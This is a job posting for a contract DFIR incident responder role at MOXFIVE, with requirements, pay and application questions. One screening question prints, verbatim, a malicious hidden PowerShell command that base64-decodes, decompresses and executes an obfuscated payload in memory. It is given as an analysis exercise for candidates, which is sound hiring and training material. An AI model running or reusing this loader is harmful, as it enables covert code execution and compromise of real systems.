moxfive - Contract Bench, Incident Responder (DFIR)
Upload My Resume
Drop here or click to browse · PDF, DOCX, DOC, RTF, TXT
Requirements
• You’re a “retired” incident responder that’s called it quits because of missed one too many holidays and an exhausting on-call schedule. If you’re honest though, you miss the investigation. Finding actual evil and seeing the latest threat activity is more exciting than your day job, and you’d love to get your fix on some live response data without committing all your waking hours. • You know that $I30 isn’t referring to your local interstate, and that the easiest way to get on your bad side is to be handed a timestamp that isn’t in UTC. You’ve got a “Tools” folder sitting on your workstation somewhere with your favorite forensic scripts at the ready to tear into the next piece of suspicious activity you see. And speaking of suspicious activity, you’ve honed a keen sense for knowing the difference between legitimate users and threat actor activity because you’ve seen them in action. • Hundreds of times. • Windows environment investigations feel like the back of your hand at this point, and you’ve been starting to expand your knowledge on cloud-native forensics. Account takeovers are the new malware after all, and investigating the latest threats across Azure, GCP, AWS, and SaaS Apps is the growing frontier you’ve been looking to sink your teeth into. • You’re insatiably curious, addicted to threat intel, and an investigator at heart. Ultimately, you’d love an opportunity that allows you to get deeply technical and solve real cases at an intensity that’s compatible with your day job and every day life. • Experience responding to threat activity as an IR consultant or SOC analyst • Strong understanding of Windows/Mac/Linux fundamentals, forensic artifacts, BEC analysis, and network analysis • Existing knowledge or passion to learn cloud-native investigations across AWS, GCP, and Azure • An unwavering emphasis on investigation at the highest level of quality • Perspective and voice to continue to shape our practice • At least a few free hours a week on your schedule to take on IR work. We’re day-job friendly (as long as your employer is cool with it). • All official MOXFIVE communications will only come from an @moxfive.com email address.
Responsibilities
• Responding to threat activity as an IR consultant or SOC analyst. • Strong understanding of Windows/Mac/Linux fundamentals and forensic artifacts. • BEC analysis skills. • Network analysis capabilities. • Experience with cloud-native environments, including Azure, GCP, AWS, and SaaS Apps (passion to learn).
Benefits
• $80 – $100 per hour • Upload your resume here to autofill key application fields. • Drop your resume here! • Parsing your resume. Autofilling key fields... • or drag and drop here • What’s your favorite forensic artifact and why? • You find the following malicious PowerShell command during your investigation. What does it do? %COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEMAMgBKAHAAVwBVAEEALwA2AFYAWABhADQAKwBpAFMAQgBmACsAMwBQADQASwBQAG4AUwBpAFIAcgB1ADkAWAA3AHIAZgBUAEQASwBBAGkAawBoAGoAbwAzAGoAQgA3AHUAMQAwAG8AQwBnAEYAQgBRAHEAaABVAEgARgAzAC8AdgBzAGUAUQBIAHQANwAzAHAAbgBKAFQAcgBJAG0AeABLAHEAaQB6AHUAMgBwADUANQB3ADYAcQBKAGoAZQBxAFQAUwB3AEUAWgBXAEoAaQBaAG0ANwBCAFEANQBDAG0AMwBoAE0AUABaAGUANwA3AFIARwBSAE0AbAArAFkAcgAvAG4AYwBPAHYASQBRAFQAWgBhAFQAdwBmAHMARwAwADMAYwAvAEkATwBoAGQATgA4ADAAQQBoAHkASAB6AFoAKwA1AEcAMABRAFAAZABaAFEAcQAzAEIAegAxADQAZAA0AGsAWgBPAGIAagBNAHAASgBOAGsASQB6AGEAagBBAEIAZAB2AGIAbgBJADMANgBWAEwAawBoAGYAbwBhAHYAMwBzADYAdABRAC8ANAAzAGMAWABVAEkAbQBZAEkAaABnAHEAdgByAE8ALwAzAGkASwB2AGIAMwB0AHYAagBJAHgAOABGAEEAZgBaAG8ATgByADgAWABNAEcAWABEAEUATAB1AEcAWQArAE8AdwBVAEcAVAArAFkAcABZAFcARAB2AEQAZABzADcASABGAGkARABKAC8ATQByAGYAdgA5ADQASgBEAEQATgAyADUAYgBJAHQANQBIAFYAawBRAEUATwB1AFoAeQBiAHMAbgBnAHMAQQBjADgAZQA1AFYAMwA3AEYAcABJAGYALwBIAEgALwBuAGkANgAxADMAdAA3AGIANgAvAGoAMwBRAG4ATABPAFQAVgBPAEsAVABZAHYAVABjAGQASgAxADkAawB2AGgAVQBUAGcANwBQAFkAeAA0AFcAOABiAEsATwBBAGgARwBSAE4ANwA1AGUAMgAxADYAagBmAHoAMQBQAHYAeAA2AG4AegBjAHUAWgA3AHYAbgBpAEoAYgBPAFAAcgBFAE0AZQB2AGcAMAB5ADAAWgBqAEsARgBQAEEAdwBWAHcASQBiAE4ATQBNAHkAWABtAGQAZgBFADMAdQB2AGIARwAvAFAAMQB3ADUAdABwADUARgBIAGIAeABmAGUAaQBSADMARgBBAGYAQgBVAEgAQgB4AHYAaAA4AEgANgBvAGUANgBhAEQAcAAzAGcATgBZAHYAawBRAGoAcwAvAGIANQBJAHYAZwBSAEkAQgBwAEYASABpAFoAQQArAEEATAB5AEIAMwBJAEQAaABkAHUAdgBjAGgAeAB5AHEARAAzADkAWABmADEAdgBoAFgARwArAEgAZwBGADkAMwBlAEYAQwBwACsARgBZAEoAZABDAGcAMgBMADUAdwBvAG4AZgBnAFEATQBZAEMATAB6AEoAMQBFAEUANABQADMAagAvAGkAVgB4AEYAKwBQADEAQQBzAEcATAB1AFcAKwA0AG4AVgBEAFcAeABnAHoAYwA2AHgAZQA4AFUAOABQADMARQAxAGQAegBOAHoAVwBzADYAeABCAEIAUABRAFMARwBoAG4AYwBwADkAWQBhAHAAbABSAGcAWQBuAGQARQBxAEMATwBEAG4ATwBXAFIARABoADQAdABzAC8ANQA1AE8AWgB2AFUAcQBHADUAVgA4AHEAcQBsADIAbABMAGoATABaADgAVwBSACsAZgBHAEYAZQBGADgAUQAyADMAMwBJADMAeABkAHkARgBQAGMAbgA2AHUAeABIAFoAagBvAG0ARAA1AFAAMgB2AHMANgBHAEgAMQA3AGEASABlADcARwBuAHUAegBhADYARQB2ADQANwArAEsAOQBuAGgAdABjAE8AVABCAFAAaQBYADcAZQBOAHcAYwA5AEMALwB2AEkAQwBtADcAMABMAE8AZwBBADQAVQBQAEIASABzAGIANQByADAAdwA5AFoATABuAE8ATwBSAFgARAB1AEkAWABnAEYAbABDAGgAKwA3ADAAeAAyAGgAbwBXADgANgBNAG4AWQBCAGYAeQB5AE8AZABEADAAZABnADEAcABoAHEAKwA3AEwANgBrAFYAWAA2ADAAbgA4ADQAVABMAHYASwBPAEgAWQBaAGwAUgBJAHMAaAB6AFYARwBaAFUAcgBEAHYAWQBMAEQATwBzAEYAOQBxAFgAVgAyAHgARQBTAFQAcABNAE0AdQBiAGkAcgBoAHcANQAxAEUAWgA2AFMASwAvAHEAMwBxADQASgArAFIAbgBTAGkAMgBtAGUAZQBKAEEAeABFAFkATABUAEIAUgBoAG0AcQBvACsAUgByAFQAcwBKAEsAbQBWAG0AYQBKAHUAWQBpADEAVgA3AGMAMwBYAGgAawA1AEYAUABtAFAAQwA2ADQAMABEAEsAZwBhAFkARABuAEEAbQBzAEoARgBpAG8ATgBPAEYATQBBAE4ANwArAEgAegArAEsAOQAxAEIAawBSAGQAZAAzAHMAQQB1ADcAMAB5AG8AMABjAFAAUQBOADEASgB4AEwAUgBxAFYAMAAwAHoAZgBZAC8ASwBnAGoAUAAzAEgANwBtAGkAZABaAFUAaQBSAFkAWABVAEgANgA1AEQAUQBRAFEASABVAEkATABUAE0ATABPADYAQgBRADEAeABMAGMALwA0ADkANAAvADgAMgA5ADcAMAB2AE0AZAAyADcAeQBBAGIANABjAFoAQwBGAE4AeABGAGMAdQBwAGsAbQA2AHAARAB0AFIAYwByAGsAQQBwAFMAOQBZAHAAcwBnAEYARgBGAEEAYgBCAE0AVABsADkAQgBDADMAbQA4AGsAdAA1AEcAMABLACsAVwAzAHIAMABFAGEATgA4AGIAbABmADIAUwA4AG4AKwA3ADUAVwA0AGcAYwA5AGUAQwByAHcAZQBDAFYAMgBZAEsAegBsAFMAVwBzAHgAbAArAFIASgBvAEsAeABuAEoAMQBGAEIAaQA0AGQAWgBHAEoAeABLAEsARgBDAG4AbQA3AGkALwBnADMAMwBiAFUAbQArAGcAbwBMADMAUwBsAEkAKwBIAGUAbgBoAEUATABiAFMAWABZAFkAMABHAEoAWgA3AE8AMABKADYAZgB6AE0ANQBCAGMAMQBxAHgAWQB2ACsAaQBKADUATwBmAFAAdQAyAE8AKwBoAEMAeAA3AFMAZQBWAGIAVwBtAGMAMwAwAC8AMgBhADIAagBQAEwAawByAEQAYgBoAFAARwBCADcAVAB2AE4AVQAyAFEASQB4AFgAUwBXAE4AUQBRAGsAVABoAHgATAA2AG0AUwB2AEkAdgBEAFUARgBwAGIAbABxAHYATQBJACsARgBVAFgAWABJAE4AMgBlAEEANABZAGcAbwAyAE0AcABUAGoAZABHAEcASwBzAGUAdABDAFQAQgBBAFgAdgArAFUAbgB1AHgARQA4AFEAbgBYAG4AOABGAFMAVgBmAFQALwBRAGsAbgBpAGwAdgB0AFEAVwBiAGYARQBGADgAYQBJAHQAZABLADAAWQBOAGUAUwBOAGUAQQBwADMAcABTAGkAdQBiAGEAWABWADEAagAwADgAZwBMAHgATQBBAEIATgBMAGEASQB5ADUAcwBJAEkAcwBVAGUAMQB2AFIARgBVADIAWABQADcARgBWAE0ARgBHAEsAZABDAE8ASQBTADgAYgAzAFMAcAAzAFIAcABYADkAVABOAEQAUQBWAGwAZwBlAEgAZQBHADQAcQBuAFgAVwBTADkAbQAzAFQANgBsADkAWQBYAFgAYwBqAEsAYQBRAC8AYwB0AFEAMwBFAHAARwBQAFcAeQBjAEcANQBFADIATwBxAE8AcQBKAEQAKwBRACsAZABDAHMANwBDAFYAMwBTAEkAeQA2AG8AVQArAGYAUwBLAEoAWABOAE0AYQBPAFMAQwBjAHcAbgBwAEQAagBUAHQAQQBtADkAZwBqAHMAbgBuAGgAMQBoAHMASAB1AGUAVABoAEcARQBJAE4ARQAyAFoAZQBxAEYARAAvAHIAdgBCAGoATAAyADcANABrAHUAOQBFAEkANABuAGoAVwBJAHcAOQAwAHQAMABLADAAaABYAFcAdAB0AC8ASgBIADMATwBJAHMAYwBLAGYAbQBhAEcAegBOAHUALwBMAFQAcwBGAHAAWgArAHEAWAA2AHMAMwBZADYAYgByAEcARgBEADgAdgA5ADUASwBCAEcAVQBkAGcANgBVADQARgBZAEIAOAB2AGQAOQArAFQAdABLAE8AVABjADQAVwBvAHgANwBHADYARQBxAEMAVwBYADYAdQB4AFQAeAAxAGMAYQBoADgATwBvAFcAagBKADcAMwBhAEQAYgA0AG4AWQBIAFMALwBKAGEAdgBFAEYAcQArAGcAbgBQAEsANQByAHMAcwB0AHkASwAwADcAYgBpAGYARwBCAFYAaAArAHAAQwBMAGcAMwBaAG4AVAA0ADgAZABWAFcAdAAvADIASgBPAGEAbQBPAGoAegB4ADAAeABlAHgASwBIAGcAdABWAGYARAAzAGIAVwBUAEwASABaADkAdABnAFoAUwA5AHAAOABMAE0ANwBqAGkAVAA2AGMASQBzAFMAeAAzAEUAeABSAHoAZABsADAAVQBlAFAAVgBnAGUAeQB4AFUANgBJAGwAKwBsAEkAZABWAFcAcwBtAHoANAA3AHQAOABjADQAWAB4AFIAaQBkAHgASQBWAGYAdwB0AG8AegA0AGMATABEAFEAbABEAGEAMwBLAHIAeQBJAG4AWQA1ADcAVQBqAEYANQA3ADMAUQBkAEcAYQBEAFIAcgB0AGkAZABiAHEAMQBTAEkAMgBrAEoAKwBRAHMAeQBVAE8ALwBIAGMAOABQADQANwA0ADQAMQBsADQAbQA2AC8AbQBxAHEAYQAyADEANgBYADYAdAAxAGwAbgBOAEoAcQB2AFIAdwA4AGkAUgBtAG4AYQBuAG8AbgBKAEIANgB5AFYAYwA5AEIAcwBlAE0ATgB4ADIAeABxAEgAaABWADgAegB1AFkAdgBNAGkAYQB0AE8AVwBpAG8AVABGAFQAZwB5AFEASgB1AG4AagBRADIAZQB5AE0AKwBYAG0AcwBzAFAAdgBhAHQAaQBlAE8AaQAzAFAAZABvAHgAcAA3AGUARABiAHQARwBhAFkAaABxAFUANABMACsAMQBwAG8ANgA1ADAAZAByAE8AYQB0AEQAeAB5AG4AZQBsADYAaABzACsAbQBXADcAVQBFACsANQBrAGIAcQArAG8AVABVAGwAMQB1AE0AeABCAEUAWgBlAGEAVAAzAGwAUABvAGIAWgBVAGwAUABqAC8AMABqAEYASABGADYATwA4ADYAVQBBADUAaQBhAGQARgBaAGQAcQBaAE4AKwBTAEEAagBqAGkAeABxAFIAegByAFoAQgB0AEsAcQBaAGkAeQAxADAAZgA2AEkARABhAEcAaQBkAEMAVABuAHAAVABmAHEAeABlADAASgBHADkAVgBGAEwAcAB6AGIAKwArAE8AegBXAEEAcABPAHIAZABuAG8ATABEAFEAVgBvAGEAbwBDAEYANgAzAGQARwBYAGkAOABCAFUANABiADgASgB4AFIAUABEAEcAawBCADcAUgB4AGcARwBOAE4AMgBVADkAeQA1AFkAegAyAHgAQgBhAFYALwBYAHoARQAwAGYATQBjADUAaQBJAC8ATgAxAFoAWQBhACsAOQBXAHMAZgBzAFEAeQBFAE8ANgB0AHEAbwBvADYARQBHAE8ANgAwAHUAcAB3AHgAcwBsADAAcABhADMAWABGADgAZAAxAEsAcAA0AHkASwBFAGwAZQAxAHkAeABRAHEAMgBxAEQANABkAHAANwBoADIAVABDAHIAWQBtAEEAZgBRAGsAcAArAFMAZQAvAHgAOABEAC8AMwBjAE8AegBhAHAAWgBVAHEATwBnAE0AawBIAFIAUwA5AFoATABwAFcATABTAEsAMwB5ADgAZQBiADAAOQB2AFYAMQA3AHUANAAvADUAbgBYAEUAQwBiAGIAVgBhAEsAeQBsADQANgBhAHQARAAwAGcARAArAFcANQBzAGwANgAwAEYAbwA2AFEANgBVAFAAKwBoADYAcgBuAGYAVwBnAEEAUwBEAFMAKwArAGkARQBEAHUAUgBLAEIAUgArADMAbQA3AHYAYwBPAEIAaABCADEAcABSAGEARgBhAHYAbABaADUAMQBIAEkASwBTAGIAdQBzAFgAYgBRAC8AMABmAGwAbABIADkAZwBZADMAMgBoAHkARwBqAGYAcABQAFIAMABYAG8AdwBpADgAYgBvAGMAWABLAFkAagBLAGkAOQBUAHIAdABTAEMANABSAFgAaAB1AHoANgA4AGIASAB4AHgAYwBJADcAMwBLAHgAcABDAGcAKwBZAFcAOQBEAHIAVABKAFQAUABUAFcAcQBWAFcAaQBuAHEAcQBkAG0AdABaAGoANwBmAFYAaAA0ADQAcwBkAFoAdQA1AGUAbwBBAC8AbQBMADgAcwB5AFQAegA1AGEAYwAxAEIASQBjAGEAMwBiAFAAUgBaADcANwArAFoANwA1AHIAdwBmAHcAbgBkAEYALwBoAHoAWQBCAEwAMgAzAHEAUABxAEIATABIAGYAbwA1AFgAcwBWAGMALwBtAHMAdQBKADYANwAvAEEAZgB6AHgATQBiAFQAUAA4AE0AbQBDADkAMAB3ADMASgBWADkASQA5AFkARABlAGIAWQBrAEIAMwB6AGYAcABoAFYAMgA0ADEAWQB1AE0AMgBOAGUAWQBXADUAMwA1AHgAdAB4AEIAZQBHAHoAWQBxAE0ATgBIAFQAcgBDAEoAawB0AHUAYgB5AGIANwBaAC8AbQBLAE8AdQBwADAASgAvAHMAVgBNAE0AYwBMAFEAYwA5ACsATgBpAEEARQBzAHgAZABDAEUASgBhAHAAVABKAGMAbgBtADMATABmAGMAMwB3AG8ANAB0AFMANABFAEQAZwBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA= • On a scale from “white and fluffy” to CloudTrail Creator, how would you rate your cloud-native forensics skills across AWS, GCP, and Azure Cloud? • What’s your availability look like on an average week to take on live response analysis work?
No credit card. Takes 10 seconds.